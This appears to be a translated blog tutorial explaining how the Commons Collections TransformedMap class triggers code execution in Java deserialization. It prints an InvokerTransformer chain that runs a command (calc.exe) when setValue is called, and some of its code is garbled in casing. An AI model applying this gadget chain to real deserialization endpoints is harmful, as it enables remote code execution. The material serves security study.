Java deserialization-The Transformedmap class can execute malicious code in the principle of 0x00 code
Map map=new HashMap (); Map.put ("Key", "value"); Call the ToString method of the target object String command= "Calc.exe"; Final string[] Execargs = new string[] {command}; Final transformer[] transformers = new transformer[] {new Constanttransformer (Runtime.class), New Invokertransformer ("GetMethod", new class[] {string.class, class[].class}, new object[] {"GetRuntime", New Class[0]}), New Invokertransformer ("Invoke", new class[] { Object.class, Object[].class}, new object[] {null, new Object[0]}), New Invokertransformer ("Exec", new class[] {string.class}, Execargs)}; Transformer transformer=new Chainedtransformer (Transformers); Map<string, object> transformedmap=transformedmap.decorate (Map,null,transformer); for (Map.entry<string,object> Entry:transformedMap.entrySet ()) {System.out.println (entry); Entry.setvalue ("anything"); }
Execution Result:
0x01 Transformedmap class Why can I execute malicious code?
Through the previous http://blog.51cto.com/13770310/2160737 article, we know that Chainedtransformer's Transformer method can execute malicious code.
The key to the above code is:
for (Map.Entry<String,Object> entry:transformedMap.entrySet()){ System.out.println(entry); entry.setValue("anything"); }
Why is Entry.setvalue ("anything") executed, and can it cause malicious code execution? Next we look at the Checksetvalue method of the Transformedmap class:
/** * Override to transform the value when using <code>setValue</code>. * * @param value the value to transform * @return the transformed value * @since Commons Collections 3.1 */ protected Object checkSetValue(Object value) { return valueTransformer.transform(value); }
The transform method of Valuetransformer is called when the Transformedmap object executes the SetValue method, if the incoming Valuetransformer is a Chainedtransformer object, That's not going to cause malicious code execution.
Then look at the code above:
So the core of the code is still the transformer method of the Chainedtransformer used
Java deserialization-How the Transformedmap class can execute malicious code